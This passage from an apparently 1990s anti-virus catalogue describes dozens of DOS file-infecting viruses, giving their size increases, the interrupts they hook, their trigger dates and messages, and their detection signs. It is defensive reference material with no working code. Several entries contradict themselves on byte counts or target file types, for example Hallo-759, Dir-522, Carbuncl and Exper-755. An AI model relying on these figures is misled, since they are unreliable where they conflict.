  6007. Detection method:  Detectable if the lengths of files increase by
  6008. 359 Bytes.
  6009.  
  6010. Remarks:
  6011. 1) Non memory resident.
  6012. 2) When infecting files, the virus does not hook INT 24h.  Error
  6013.     message will appear when I/O errors occur.
  6014.  
  6015. [Findm-608]
  6016. Virus Name: Findm-608
  6017. Virus Type: Parasitic Virus
  6018. Virus Length: Infected COM file sizes increase by 608-623 Bytes.
  6019.                      (Does not infect EXE files.)
  6020. PC Vectors Hooked: None
  6021.  
  6022. Execution Procedure:
  6023. 1) Searches for a COM file in the current directory.
  6024. 2) Checks whether the file is infected. If yes, continues to
  6025.     search until an uninfected file is found.
  6026. 3) If an uninfected file is found, the virus will proceed to
  6027.     infect it.
  6028.  
  6029. Damage: None
  6030.  
  6031. Detection method:  Detectable if the lengths of files increase by
  6032. 608-623 Bytes.
  6033.  
  6034. Remarks:
  6035. 1) The part of infection of the virus was badly written.  Most
  6036.     of the infected files cannot be executed normally (also the
  6037.     virus is not able to infect and damage).
  6038. 2) Non memory resident.
  6039. 3) When infecting files, the virus does not hook INT 24h.  Error
  6040.     message will appear when I/O errors occur.
  6041.  
  6042. [ARCV-2]
  6043. Virus Name: Arcv-2
  6044. Virus Type: Parasitic Virus
  6045. Virus Length: Infected EXE file sizes increase by 693 Bytes
  6046.                      (Does not infect COM files).
  6047. PC Vectors Hooked: INT 24h
  6048.  
  6049. Execution Procedure:
  6050. 1) Searches for an EXE file in the current directory.
  6051. 2) Checks whether the file is infected.  If yes, the virus
  6052.     continues to search.
  6053. 3) If an uninfected file is found, the virus will proceed to
  6054.     infect it (only infects one file at a time).
  6055. 4) Whether an uninfected EXE file is found or not,
  6056.     the virus will check the system date.  When the date is
  6057.     "April" or "the sixth of the month", the virus will display
  6058.  
  6059.     "Help  ..  Help  ..  I'm Sinking ........"
  6060.  
  6061.     on the screen.
  6062.  
  6063. Damage: None
  6064.  
  6065. Detection method:  Detectable if the lengths of files increase by
  6066. 693 Bytes.
  6067.  
  6068. Remarks:
  6069. 1) The part of infection was badly written.  Most of the
  6070.     infected files cannot be executed normally (also the virus is
  6071.     not able to infect and damage).
  6072. 2) Non memory resident.
  6073. 3) When infecting files, the virus does not hook INT 24h.  Error
  6074.     message will appear when I/O errors occur.
  6075.  
  6076. [Hallo-759]
  6077. Virus Name: Hallo-759
  6078. Virus Type: Parasitic Virus
  6079. Virus Length: Infected COM file sizes increase by 533 bytes
  6080.                      (Does not infect EXE files).
  6081. PC Vectors Hooked: None
  6082.  
  6083. Execution Procedure:
  6084. 1) Searches for a COM file in the current directory.
  6085. 2) Checks whether the file is infected. If yes, continues to
  6086.     search until an uninfected file is found and then infects it.
  6087.     (only infects one file at a time).  After infecting, the virus
  6088.     displays the string:
  6089.  
  6090.     "I have got a virus for you!".
  6091.  
  6092. Damage: None
  6093.  
  6094. Detection method: Detectable when the string "I have got a virus for
  6095. you!" is displayed when executing programs and if the lengths of
  6096. files increases by 759-775 Bytes.
  6097.  
  6098. Remarks:
  6099. 1) The infection part was badly written.  After the infected
  6100.     files end, the system will hang.
  6101. 2) Non memory resident.
  6102. 3) When infecting files, the virus does not hook INT 24h.  Error
  6103.     message will appear when I/O errors occur.
  6104.  
  6105. [Atomic-2A]
  6106. Virus Name: Atomic-2a
  6107. Virus Type: Parasitic Virus
  6108. Virus Length: Infected COM file sizes increase by 350 Bytes
  6109.                      (Does not infect EXE files).
  6110. PC Vectors Hooked: None
  6111.  
  6112. Execution Procedure:
  6113. 1) Searches for a COM file in the current directory.
  6114. 2) Checks whether the file is infected.  If yes, continues to
  6115.     search until an uninfected file is found and then infects it.
  6116.     (only infects one file at a time.)
  6117.  
  6118. Damage: None
  6119.  
  6120. Detection method:  Detectable if the lengths of files increase by
  6121. 350 Bytes.
  6122.  
  6123. Remarks:
  6124. 1) Non memory resident.
  6125. 2) When infecting files, the virus does not hook INT 24h. Error
  6126.     message will appear when I/O errors occur.
  6127.  
  6128. [Atomic-1B]
  6129. Virus Name: Atomic-1b
  6130. Virus Type: Parasitic Virus
  6131. Virus Length:  The lengths of the infected COM files do not
  6132.                       increase (Does not infect EXE files.)
  6133. PC Vectors Hooked: None
  6134.  
  6135. Execution Procedure:
  6136. 1) When the system date is the 1st, the virus will display
  6137.  
  6138.     "The Atomic Dustbin--YOUR PHUCKED!"
  6139.  
  6140.     The system then hangs.
  6141.  
  6142. 2) When the system date is the 26th, the following message will
  6143.     be displayed before the system hangs:
  6144.  
  6145.     "The Atomic Dustbin 1B -- This is almost the second step !"
  6146.  
  6147. 3) When the system date is neither the 1st nor the 26th:
  6148.      i) the virus proceeds to search all COM files in the current
  6149.          directory;
  6150.     ii) checks whether the file is infected. If yes, continues to
  6151.          search;
  6152.    iii) if an uninfected file is found, proceeds to infect it.
  6153.          (only infects two files at a time).  After infecting,
  6154.          displays "Program execution terminated."
  6155.  
  6156. Damage: None
  6157.  
  6158. Detection method: Detectable if the string "Program execution
  6159. terminated" is displayed when a program is executed.
  6160.  
  6161. Remarks:
  6162. 1) Non memory resident.
  6163. 2) When infecting files, the virus does not hook INT 24h. Error
  6164.     message will appear when I/O errors occur.
  6165.  
  6166. [Atomic-1A]
  6167. Virus Name: Atomic-1A
  6168. Virus Type: Parasitic Virus
  6169. Virus Length:  The lengths of the infected COM files do not
  6170.                       increase (Does not infect EXE files.)
  6171. PC Vectors Hooked: None
  6172.  
  6173. Execution Procedure:
  6174. 1) When the system date is the 25th, the virus displays the
  6175.     string "The Atomic Dustbin 1A -- This is almost the first step
  6176.     !" and hangs the system.
  6177. 2) When the system date is not the 25th:
  6178.      i) it searches for a COM file in the current directory;
  6179.     ii) checks whether the file is infected. If yes, continues to
  6180.          search;
  6181.    iii) if an uninfected file is found, the virus will proceed to
  6182.          infect it (only infects two files at a time).  After
  6183.          infecting, displays the string "Bad command or file name".
  6184.  
  6185. Damage: None
  6186.  
  6187. Detection method: Detectable if the string "bad command or file name"
  6188. is displayed when a file is executed.
  6189.  
  6190. Remarks:
  6191. 1) Non memory resident.
  6192. 2) When infecting files, the virus does not hook INT 24h. Error
  6193.     message will appear when I/O errors occur.
  6194.  
  6195. [Arusiek]
  6196. Virus Name: Arusiek
  6197. Virus Type: Parasitic Virus
  6198. Virus Length: Infected EXE and COM file sizes increase by 817
  6199.                      bytes.
  6200. PC Vectors Hooked:  INT 21h and INT 24h
  6201.  
  6202. Execution Procedure:
  6203. 1) Checks whether it already resides in the memory.  If not, it
  6204.     hooks INT 21h and implants itself in memory, and then executes
  6205.     the host program.
  6206. 2) If it already resides in memory, the host program will be
  6207.     executed directly.
  6208.  
  6209. Infection Procedure:
  6210. 1) Infects files by AH=4B in INT 21h. Uninfected files will be
  6211.     infected when they are executed.
  6212. 2) Before infecting files, the virus will hook INT 24h in order
  6213.     to ignore I/O errors.
  6214.  
  6215. Damage:  None
  6216.  
  6217. Detection method:  Detectable if the lengths of files increase
  6218. by 817 bytes.
  6219.  
  6220. [Atas-3]
  6221. Virus Name: Atas-3
  6222. Virus Type: Parasitic Virus
  6223. Virus Length: Infected EXE and COM file sizes increase by 1268
  6224.                      bytes.
  6225. PC Vectors Hooked:  INT 21h and INT 24h
  6226.  
  6227. Execution Procedure:
  6228. 1) Checks whether it resides in the memory.  If not, hooks INT
  6229.     21h and implants itself in the memory, and then executes the
  6230.     host program.
  6231. 2) If it already resides in the memory, the host program will be
  6232.     executed directly.
  6233.  
  6234. Infection Procedure:
  6235. 1) Infects files by AH=4B in INT 21h.  Uninfected files will be
  6236.     infected when they are executed.
  6237. 2) Before infecting files, the virus will hook INT 24h in order
  6238.     to ignore I/O errors.
  6239.  
  6240. Damage:  None
  6241.  
  6242. Detection method:  Detectable if the lengths of files increase
  6243. by 1268 bytes.
  6244.  
  6245. [ARCV-570]
  6246. Virus Name: Arcv-570
  6247. Virus Type: Parasitic Virus
  6248. Virus Length:  Infected EXE file sizes increase by 570-585 Bytes
  6249.                       (Does not infect COM files.)
  6250. PC Vectors Hooked: None
  6251.  
  6252. Execution Procedure:
  6253. 1) Searches for an EXE file in the current directory.
  6254. 2) Checks whether the file is infected. If yes, continues to
  6255.     search until an uninfected file is found and then infects it
  6256.     (only infects one file at a time).
  6257.  
  6258. Damage: None
  6259.  
  6260. Detection method: Detectable if the lengths of files increase by
  6261. 570-585 Bytes.
  6262.  
  6263. Remarks:
  6264. 1) Non memory resident.
  6265. 2) When infecting files, it does not hook INT 24h. Error message
  6266.     will appear when I/O errors occur.
  6267.  
  6268. [Atas-3215]
  6269. Virus Name: Atas-3215
  6270. Virus Type: Parasitic Virus.
  6271. Virus Length: About 3215 bytes (there are several variations.)
  6272. PC Vectors Hooked:  INT 21h
  6273.  
  6274. Execution Procedure: (The virus only infects files in DOS 3.3)
  6275. 1) Checks whether it resides in the memory.  If not, hooks INT
  6276.     21h and implants itself in the memory, and proceeds to execute
  6277.     the original program.
  6278. 2) If it already resides in the memory, the host program will be
  6279.     executed directly.
  6280.  
  6281. Infection Procedure:
  6282. 1) Infects files by AH=4B in INT 21h.  Uninfected files will be
  6283.     infected when they are executed.
  6284.  
  6285. [Andromda]
  6286. Virus Name: Andromda
  6287. Virus Type: Parasitic Virus
  6288. Virus Length:  Infected COM files increase by 1140 Bytes
  6289.                       (Does not infect EXE files).
  6290. PC Vectors Hooked: None
  6291.  
  6292. Execution Procedure:
  6293. 1) Searches for a COM file in the current directory.
  6294. 2) Checks whether the file is infected.  If yes, continues to
  6295.     search until an uninfected file is found.
  6296. 3) Then infects it (only infects two files at a time.)
  6297.  
  6298. Damage: None
  6299.  
  6300. Detection method:  Detectable if the lengths of files increase by
  6301. 1140 Bytes.
  6302.  
  6303. Remarks:
  6304. 1) Non memory resident.
  6305. 2) When infecting files, the virus does not hook INT 24h. Error
  6306.     message will appear when I/O errors occur.
  6307.  
  6308. [Grunt-529]
  6309. Virus Name: Grunt-529
  6310. Virus Type: Parasitic Virus
  6311. Virus Length:  Infected COM files increase by 529 Bytes
  6312.                       (Does not infect EXE files).
  6313. PC Vectors Hooked: None
  6314.  
  6315. Execution Procedure:
  6316. 1) Searches for a COM file in the current directory.
  6317. 2) Checks whether the file is infected.  If yes, continues to
  6318.     search.
  6319. 3) If an uninfected file is found, infects it. (only infects one
  6320.     file at a time.)
  6321. 4) Checks the system date no matter an uninfected COM
  6322.     file is found or not.  If the date is Friday and it is after the
  6323.     year 1993, the virus displays the following information on
  6324.     the screen:
  6325.  
  6326.     "Nothing like the smell of napalm in the morning!"
  6327.  
  6328. Damage: None
  6329.  
  6330. Detection method:  Detectable if the lengths of files increase by
  6331. 529 Bytes.
  6332.  
  6333. Remarks:
  6334. 1) Non memory resident.
  6335. 2) When infecting files, the virus does not hook INT 24h.  Error
  6336.     message will appear when I/O errors occur.
  6337.  
  6338. [Ein-Volk]
  6339. Virus Name: Ein-Volk
  6340. Virus Type: Parasitic Virus
  6341. Virus Length:  Infected COM files increase by 482 Bytes
  6342.                       (Does not infect EXE files.)
  6343. PC Vectors Hooked: None
  6344.  
  6345. Execution Procedure:
  6346. 1) Searches for a COM file in the current directory.
  6347. 2) Checks whether the file is infected.  If yes, continues to
  6348.     search.
  6349. 3) If an uninfected file is found, proceeds to infect it. Does
  6350.     not stop searching until all the COM files in the directory are
  6351.     infected.
  6352.  
  6353. Damage: None
  6354.  
  6355. Detection method:  Detectable if the lengths of files increase by
  6356. 482 Bytes.
  6357.  
  6358. Remarks:
  6359. 1) Non memory resident.
  6360. 2) When infecting files, the virus does not hook INT 24h. Error
  6361.     message will appear when I/O errors occur.
  6362.  
  6363. [DOS7]
  6364. Virus Name: Dos7
  6365. Virus Type: Parasitic Virus
  6366. Virus Length:  Infected COM files increase by 342 Bytes
  6367.                       (Does not infect EXE files).
  6368. PC Vectors Hooked: None
  6369.  
  6370. Execution Procedure:
  6371. 1) Searches for a COM file in the current directory.
  6372. 2) Checks whether the file is infected. If yes, it continues to
  6373.     search.
  6374. 3) If an uninfected file is found, the virus proceeds to infect
  6375.     it (only infects one file at a time).
  6376.  
  6377. Damage: None
  6378.  
  6379. Detection method:  Detectable if the lengths of files increase by
  6380. 342 Bytes.
  6381.  
  6382. Remarks:
  6383. 1) Non memory resident.
  6384. 2) When infecting files, the virus does not hook INT 24h. Error
  6385.     message will appear when I/O errors occur.
  6386.  
  6387. [Dooms-715]
  6388. Virus Name: Dooms-715
  6389. Virus Type: Parasitic Virus
  6390. Virus Length:  Infected COM files increase by 715 Bytes
  6391.                       (Does not infect EXE files).
  6392. PC Vectors Hooked: None
  6393.  
  6394. Execution Procedure:
  6395. 1) Searches for a COM file in the root directory.
  6396. 2) Checks whether the file is infected. If yes, continues to
  6397.     search.
  6398. 3) If an uninfected file is found, infects it (only infects one
  6399.     file at a time).
  6400.  
  6401. Damage: None
  6402.  
  6403. Detection method:  Detectable if the lengths of files increase by
  6404. 715 Bytes.
  6405.  
  6406. Remarks:
  6407. 1) Non memory resident.
  6408. 2) When infecting files, the virus does not hook INT 24h. Error
  6409.     message will appear when I/O errors occur.
  6410.  
  6411. [Dir-522]
  6412. Virus Name: Dir-522
  6413. Virus Type: Parasitic Virus
  6414. Virus Length: Infected COM files increase by 1268 bytes
  6415.                      (Does not infect EXE files).
  6416. PC Vectors Hooked:  INT 21h and INT 24h
  6417.  
  6418. Execution Procedure:
  6419. 1) Checks whether it resides in memory.  If not, hooks INT 21h
  6420.     and implants itself in memory, and then executes the host
  6421.     program.
  6422. 2) If it already resides in memory, the host program will be
  6423.     executed directly.
  6424.  
  6425. Infection Procedure:
  6426. 1) The virus infects files by "dir" command. When "dir" command
  6427.     is executed, the virus searches for an uninfected file and
  6428.     then infects it.
  6429. 2) Before infecting files, the virus hooks INT 24h in order to
  6430.     ignore I/O errors.
  6431.  
  6432. Damage:  None
  6433.  
  6434. Detection method:  Detectable if the lengths of files increase
  6435. by 522 bytes.
  6436.  
  6437. [Compan-83]
  6438. Virus Name: Compan-83
  6439. Virus Type: Parasitic Virus
  6440. Virus Length:  83 bytes
  6441. PC Vectors Hooked:  INT 21h
  6442.  
  6443. Execution Procedure:
  6444. 1) Checks whether it resides in memory. If not, hooks INT 21h and
  6445.     implants itself in memory, and then executes the host program.
  6446. 2) If it already resides in memory, the program will be executed
  6447.     directly.
  6448.  
  6449. Infection Procedure:
  6450. 1) The virus infects files by AH=4B in INT 21h. When an infected
  6451.     EXE file is executed, the virus will create a COM file with a
  6452.     length of 83 bytes. The content of the COM file is the virus
  6453.     itself (hidden file).
  6454. 2) When infecting files, the virus does not hook INT 24h. Error
  6455.     message will appear when I/O errors occur.
  6456.  
  6457. Damage:  None
  6458.  
  6459. Detection method:  Detectable if the file increases by 83 bytes.
  6460.  
  6461. [ChipShit]
  6462. Virus Name: Chipshit
  6463. Virus Type: Parasitic Virus
  6464. Virus Length:  Infected COM files increase by 877 bytes
  6465.                       (Does not infect EXE files).
  6466. PC Vectors Hooked:  None
  6467.  
  6468. Execution Procedure:
  6469. 1) Checks the system date. If the date is later than Feb.
  6470.     11, 1993, the virus displays the following information on the
  6471.     screen:
  6472.  
  6473.      "Hej! Tu wirus chipshit! Co........"
  6474.  
  6475. 2) If the date is before Feb. 11, 1993:
  6476.     a) Searches for a COM file in the current directory.
  6477.     b) Checks whether the file is infected. If yes, it continues to
  6478.         search.
  6479.     c) If an uninfected file is found, it proceeds to infect it
  6480.         (only infects one file at a time).
  6481.  
  6482. Damage:  None
  6483.  
  6484. Detection method:  Detectable if the lengths of files increase by
  6485. 877 bytes.
  6486.  
  6487. Remarks:
  6488. 1) Non memory resident.
  6489. 2) When infecting files, the virus does not hook INT 24h. Error
  6490.     message will appear when I/O errors occur.
  6491.  
  6492. [Carbuncl]
  6493. Virus Name: Carbuncl
  6494. Virus Type: Parasitic Virus
  6495. Virus Length:  622 bytes
  6496. PC Vectors Hooked:  None
  6497.  
  6498. Execution Procedure:
  6499. 1) With a 5/6 chance probability:
  6500.     i) Searches for an EXE file in the current directory.
  6501.    ii) Renames the file as *.crp, and then creates a  *.bat
  6502.         file with the following commands:
  6503.  
  6504.                    @ECHO OFF
  6505.                    CARBUNCL
  6506.                    RENAME JEXE.CRP JEXE.EXE
  6507.                    JEXE.EXE
  6508.                    RENAME JEXE.EXE JEXE.CRP
  6509.                    CARBBUNCL
  6510.  
  6511.        (JEXE.EXE is the infected file, and CARBUNCL is the virus)
  6512.   iii) Repeats the above procedure until all EXE files are
  6513.         infected.
  6514. 2) With a 1/6 chance probability:  Infects five *.CRP files.
  6515.  
  6516. Damage:  None
  6517.  
  6518. Detection method: Detectable if the lengths of files increase
  6519. by 877 bytes.
  6520.  
  6521. Remarks:
  6522. 1) Non memory resident.
  6523. 2) When infecting files, the virus does not hook INT 24h. Error
  6524.     message will appear when I/O errors occur.
  6525.  
  6526. [VCL-2]
  6527. Virus Name: Vcl-2
  6528. Virus Type: Parasitic Virus
  6529. Virus Length:  Infected COM files increase by 663 bytes
  6530.                       (Does not infect EXE files).
  6531. PC Vectors Hooked:  None
  6532.  
  6533. Execution Procedure:
  6534. 1) Searches for a COM file in the current directory.
  6535. 2) Checks if the file is infected. If yes, continues to search.
  6536. 3) If an uninfected file is found, it proceeds to infect it
  6537.     (only infects two files at a time).
  6538.  
  6539. Damage:  None
  6540.  
  6541. Detection method: Infected files increase by 663 bytes
  6542.  
  6543. Remarks:
  6544. 1) Non memory resident.
  6545. 2) When infecting files, the virus does not hook INT 24h. Error
  6546.     message will appear when I/O errors occur.
  6547.  
  6548. [Necro]
  6549. Virus Name: Necro
  6550. Virus Type: Parasitic Virus
  6551. Virus Length:  Infected COM and EXE files increase by 696 bytes.
  6552. PC Vectors Hooked:  None
  6553.  
  6554. Execution Procedure:
  6555. 1) Searches for an uninfected COM/EXE file.
  6556. 2) Checks if the file has been infected. If yes, continues to
  6557.     search.
  6558. 3) If an uninfected file is found, infects it (infects three
  6559.     files at a time).
  6560.  
  6561. Damage:  None
  6562.  
  6563. Detection method:  Detectable if the files increase by 696 bytes
  6564.  
  6565. Remarks:
  6566. 1) The infection part was badly written, so most of the infected
  6567.     files can not execute (not able to infect and damage).
  6568. 2) Non memory  resident.
  6569. 3) Before infecting files, the virus does not hook INT 24h.
  6570.     Error message will appear when I/O errors occur.
  6571.  
  6572. [Eagl-7705]
  6573. Virus Name: Eagl-7705
  6574. Virus Type: Parasitic Virus
  6575. Virus Length:  7705 bytes
  6576.  
  6577. Execution Procedure:
  6578. 1) Searches for an EXE file in the  current directory.
  6579. 2) Then creates a COM file with a length of 7705 bytes. The
  6580.     contents of the COM file is the virus itself (hidden file).
  6581. 3) Repeats the procedure until all EXE files in the current
  6582.     directory are infected.
  6583.  
  6584. Damage:  None
  6585.  
  6586. Detection method:  Detectable if the lengths of files increase
  6587. by 7705 bytes.
  6588.  
  6589. Remarks:  Non memory resident.
  6590.  
  6591. [Eno-2430]
  6592. Virus Name: Eno-2430
  6593. Virus Type: Parasitic Virus
  6594. Virus Length:  Infected COM and EXE files increase by 2430-2445 bytes.
  6595. PC Vectors Hooked:  INT 21h and INT 24h
  6596.  
  6597. Execution Procedure:
  6598. 1) Checks if it resides in memory. If not, hooks INT 21h,
  6599.     installs itself as memory resident and then executes the host
  6600.     program.
  6601. 2) If it already resides in memory, executes the host program
  6602.     directly.
  6603.  
  6604. Infection Procedure:
  6605. 1) The virus infects files by AH=4B in INT 21h. When an
  6606.     uninfected program is executed, it becomes infected.
  6607. 2) Before infecting files, Eno-2430 will hook INT 24h first to
  6608.     ignore I/O errors.
  6609.  
  6610. Damage:  The virus has a counter; after infecting a file, it
  6611. subtracts 1 from the counter. When the counter=0, the virus
  6612. will destroy all data on the hard disk.
  6613.  
  6614. Detection method:  Detectable if the files increase by 2430-2445
  6615. bytes.
  6616.  
  6617. [Exper-755]
  6618. Virus Name: Exper-755
  6619. Virus Type: Parasitic Virus
  6620. Virus Length:  Infected EXE files increase by 755 bytes
  6621.                       (Does not infect COM files).
  6622. PC Vectors Hooked:  INT 24h
  6623.  
  6624. Execution Procedure:
  6625. 1) Searches for an EXE file in the current directory.
  6626. 2) Checks if the file is infected. If yes, continues to search.
  6627. 3) If an uninfected file is found, proceeds to infect it. Does
  6628.     not stop searching until all the COM files in the directory
  6629.     are infected.
  6630.  
  6631. Damage:  None
  6632.  
  6633. Detection method:  Detectable if the files increase by 755 bytes.
  6634.  
  6635. Remarks:
  6636. 1) Non memory resident.
  6637. 2) Before infecting, the virus hooks INT 24h first to ignore I/O
  6638.     errors.
  6639.  
  6640. [Findm-695]
  6641. Virus Name: Findm-695
  6642. Virus Type: Parasitic Virus
  6643. Virus Length:  Infected COM files increase by 695-710 bytes
  6644.                       (Does not infect EXE files).
  6645. PC Vectors Hooked:  None
  6646.  
  6647. Execution Procedure:
  6648. 1) Searches for a COM file in the current directory.
  6649. 2) Checks if the file is infected. If yes, continues to search.
  6650. 3) If an uninfected file is found, proceeds to infect it.
  6651.  
  6652. Damage: None
  6653.  
  6654. Detection method: Detectable if the files increase by 695-710
  6655. bytes.
  6656.  
  6657. Remarks:
  6658. 1) The infection part of the virus was badly written.  Most of
  6659.     the infected files can not be executed normally (The virus is
  6660.     not able to infect and damage).
  6661. 2) Non memory resident.
  6662. 3) When infecting files, the virus does not hook INT 24h. Error
  6663.     message will appear when I/O errors occur.
  6664.  
  6665. [FR-1013]
  6666. Virus Name: FR-1013
  6667. Virus Type: Parasitic Virus
  6668. Virus Length: Infected EXE and COM files increase by 1013-1028 bytes.
  6669. PC Vectors Hooked:  INT 21h
  6670.  
  6671. Execution Procedure:
  6672. 1) Checks if it resides in the memory. If not, hooks INT 21h,
  6673.     installs itself as memory resident and  then executes the
  6674.     host program.
  6675. 2) If it already resides in the memory, proceeds to execute the
  6676.     host program directly.
  6677.  
  6678. Infection Procedure:
  6679. 1) The virus infects files by AH=4B in INT 21h. When an
  6680.     uninfected program is executed, it becomes infected.
  6681. 2) When infecting files, the virus does not hook INT 24h. Error
  6682.     message will appear when I/O errors occur.
  6683.  
  6684. Damage:  None
  6685.  
  6686. Detection method:  Detectable if the files increase by 1013-1028
  6687. bytes.
  6688.  
  6689. [Harm-1082]
  6690. Virus Name: Harm-1082
  6691. Virus Type: Parasitic Virus
  6692. Virus Length: Infected COM files increase by 1082-1097
  6693.                      bytes (Does not infect EXE files).
  6694. PC Vectors Hooked:  INT 21h
  6695.  
  6696. Execution Procedure:
  6697. 1) Checks if it resides in the memory. If not, it hooks INT 21h,
  6698.     installs itself as memory resident and then executes the host
  6699.     program.
  6700. 2) If it already resides in the memory, it proceeds to execute the
  6701.     host program directly.
  6702.  
  6703. Infection Procedure: The virus infects files by AH=4B in INT 21h.
  6704. When an uninfected program is executed, it becomes infected.
  6705.  
  6706. Damage:  None
  6707.  
  6708. Detection method:  Detectable if the files increase by 1082-1097
  6709. bytes.
  6710.  
  6711.  
  6712.  
  6713.  
  6714.  
  6715.  
  6716.  
  6717.  
  6718.  
  6719.  
  6720.  
  6721.  
  6722.  
  6723.  
  6724.  
  6725.  
  6726.  
  6727.  
  6728.  
  6729.  
  6730.  
  6731.  
  6732. [Hor-2248]
  6733. Virus Name: Hor-2248
  6734. Virus Type: Parasitic Virus
  6735. Virus Length:  Infected EXE and COM files increase by 2248
  6736.                bytes.
  6737.  
  6738. PC Vectors Hooked:  INT 21h and INT 24h
  6739.  
  6740. Execution Procedure: (The virus cannot run in DOS 5.0)
  6741. 1) Checks if it resides in the memory. If not, it hooks INT 21h,
  6742.     installs itself as memory resident and then executes the host
  6743.     program.
  6744. 2) If it already resides in the memory, it proceeds to execute the host
  6745.    program directly.
  6746.  
  6747. Infection Procedure:
  6748. 1) The virus infects files by AH=4B in INT 21h. When an
  6749.    uninfected program is executed, it becomes infected.
  6750. 2) Before infecting, the virus hooks INT 24h first to ignore I/O
  6751.    errors.
  6752.  
  6753. Damage: None
  6754.  
  6755. Detection method: Detectable if the files increase by 2248
  6756. bytes.
  6757.  
  6758. [Encroach2]
  6759. Virus Name: Encroach2
  6760. Virus Type: Parasitic Virus
  6761.  
  6762. PC Vectors Hooked:  INT 24h
  6763.  
  6764. Execution Procedure:
  6765. 1) Searches for a COM file in the current directory.
  6766. 2) Checks if the file is infected. If yes, it continues to search.
  6767. 3) If an uninfected file is found, proceeds to infect it (infects
  6768.    one file at a time).
  6769.  
  6770. Damage:  None
  6771.  
  6772. Remarks:
  6773. 1) Non memory resident.
  6774. 2) Before infecting, the virus hooks INT 24h to ignore I/O errors.
  6775.  
  6776. [Encroach]
  6777. Virus Name: Encroach
  6778. Virus Type: Parasitic Virus
  6779.  
  6780. PC Vectors Hooked:  INT 24h
  6781.  
  6782. Execution Procedure:
  6783. 1) Searches for a COM file in the current directory.
  6784. 2) Checks if the file is infected. If yes, it continues to search.
  6785. 3) If an uninfected file is found, proceeds to infect it (infects
  6786.    one file at a time).
  6787.  
  6788. Damage:  None
  6789.  
  6790. Remarks:
  6791. 1) Non memory resident.
  6792. 2) Before infecting, the virus hooks INT 24h to ignore I/O errors.
  6793.  
  6794. [DWI]
  6795. Virus Name: Dwi
  6796. Virus Type: Parasitic Virus
  6797. Virus Length:  Infected EXE files increase by 1050-1070
  6798.                bytes (Does not infect COM files).
  6799.  
  6800. PC Vectors Hooked:  INT 21h and INT 24h
  6801.  
  6802. Execution Procedure:
  6803. 1) Checks if it resides in the memory.  If not, it hooks INT 21h,
  6804.    installs itself as memory resident and proceeds to execute the
  6805.    host program.
  6806. 2) If it already resides in the memory, it proceeds to execute the host
  6807.    program directly.
  6808.  
  6809. Infection Procedure:
  6810. 1) The virus infects files by AH=4B in INT 21h. When an
  6811.    uninfected program is executed, it becomes infected.
  6812. 2) Before infecting, the virus hooks INT 24h to ignore I/O errors.
  6813.  
  6814. Damage: None
  6815.  
  6816. Detection method: Detectable if the files increase by 1050-1070
  6817. bytes.
  6818.  
  6819. [Dennis]
  6820. Virus Name: Dennis (has at least two variations)
  6821. Virus Type: Parasitic Virus
  6822. PC Vectors Hooked:  INT 21h
  6823.  
  6824. Execution Procedure:
  6825. 1) Checks if it resides in the memory.  If not, it hooks INT 21h,
  6826.    installs itself as memory resident and then executes the
  6827.    host program.
  6828. 2) If it already resides in the memory, it proceeds to execute the
  6829.    host program directly.
  6830.  
  6831. Infection Procedure:
  6832. 1) The virus infects files by AH=4B in INT 21h. When an
  6833.    uninfected program is executed, it becomes infected.
  6834. 2) When infecting files, Dennis does not hook INT 24h. Error
  6835.    message will appear when I/O errors occur.
  6836.  
  6837. Damage:  None
  6838.  
  6839. [Comsysexe]
  6840. Virus Name: Comsysexe (There are several variations)
  6841. Virus Type: Parasitic Virus
  6842.  
  6843. PC Vectors Hooked:  INT 21h
  6844.  
  6845. Execution Procedure:
  6846. 1) Checks if it resides in the memory.  If not, it hooks
  6847.    INT 21h, installs itself as memory resident and
  6848.    then executes the host program.
  6849. 2) If it already resides in the memory, it proceeds to
  6850.    execute the host program directly.
  6851.  
  6852. Infection Procedure:
  6853. 1) The virus infects files by AH=4B in INT 21h.
  6854.    When an uninfected program is executed, it
  6855.    becomes infected. (infects EXE, COM and SYS
  6856.    files)
  6857. 2) When infecting files, Comsysexe does not hook
  6858.    INT 24h.  Error message will appear when I/O
  6859.    errors occur.
  6860.  
  6861. Damage:  None
  6862.  
  6863. [Cruncher]
  6864. Virus Name: Cruncher
  6865. Virus Type: Parasitic Virus
  6866.  
  6867. PC Vectors Hooked:  INT 21h and INT 24h
  6868.  
  6869. Execution Procedure:
  6870. 1) Check if it resides in memory.  If not, it hooks INT 21h,
  6871.    installs itself as memory resident and then executes the host
  6872.    program.
  6873. 2) If it already resides in memory, it proceeds to execute the host
  6874.    program directly.
  6875.  
  6876. Infection Procedure:
  6877. 1) The virus infects files by AH=4B in INT 21h. When an
  6878.    uninfected program is executed, it becomes infected.
  6879. 2) Before infecting files, the virus hooks INT 24h to ignore I/O
  6880.    errors.
  6881.  
  6882. Damage:  None
  6883.  
  6884. [Ice-159]
  6885. Virus Name: Ice-159
  6886. Virus Type: Parasitic Virus
  6887. Virus Length:  Infected COM files increase by 159 bytes
  6888.                (Does not infect EXE files).
  6889.  
  6890. PC Vectors Hooked:  None
  6891.  
  6892. Execution Procedure:
  6893. 1) Searches for a COM file in the current directory.
  6894. 2) Checks if the file is infected. If yes, it continues to search.
  6895. 3) If an uninfected file is found, it proceeds to infect it (infects
  6896.    one file at a time).
  6897.  
  6898. Damage:  None
  6899.  
  6900. Detection method:  Detectable if the files increase by 159 bytes.
  6901.  
  6902. Remarks:
  6903. 1) Non memory resident.
  6904. 2) When infecting files, the virus does not hook INT 24h.  Error
  6905.    messages will appear when I/O errors occur.
  6906.  
  6907. [Joker3]
  6908. Virus Name: Joker3
  6909. Virus Type: Parasitic Virus
  6910. Virus Length:  Infected COM files increase by 1084 bytes
  6911.                (Does not infect EXE files).
  6912.  
  6913. PC Vectors Hooked:  INT 21h
  6914.  
  6915. Execution Procedure:
  6916. 1) Checks if it resides in the memory.  If not, it hooks INT 21h,
  6917.    installs itself as memory resident and then executes the host
  6918.    program.
  6919. 2) If it already resides in the memory, it proceeds to execute the
  6920.    host program directly.
  6921.  
  6922. Infection Procedure: The virus infects files by INT 21h.  When
  6923. INT 21h is executed, all the COM files in the current directory
  6924. will be infected.  When infecting files, the virus does not hook
  6925. INT 24h.  Error message will appear when I/O errors occur.
  6926.  
  6927. Damage:  None
  6928.  
  6929. Detection method:  Detectable if the files increase by 1084
  6930. bytes.
  6931.  
  6932. [Mi-Nazi]
  6933. Virus Name: Mi-Nazi
  6934. Virus Type: Parasitic Virus
  6935. Virus Length:  Infected COM files increase by 1084 bytes
  6936.                (Does not infect EXE files).
  6937.  
  6938. PC Vectors Hooked:  INT 21h
  6939.  
  6940. Execution Procedure:
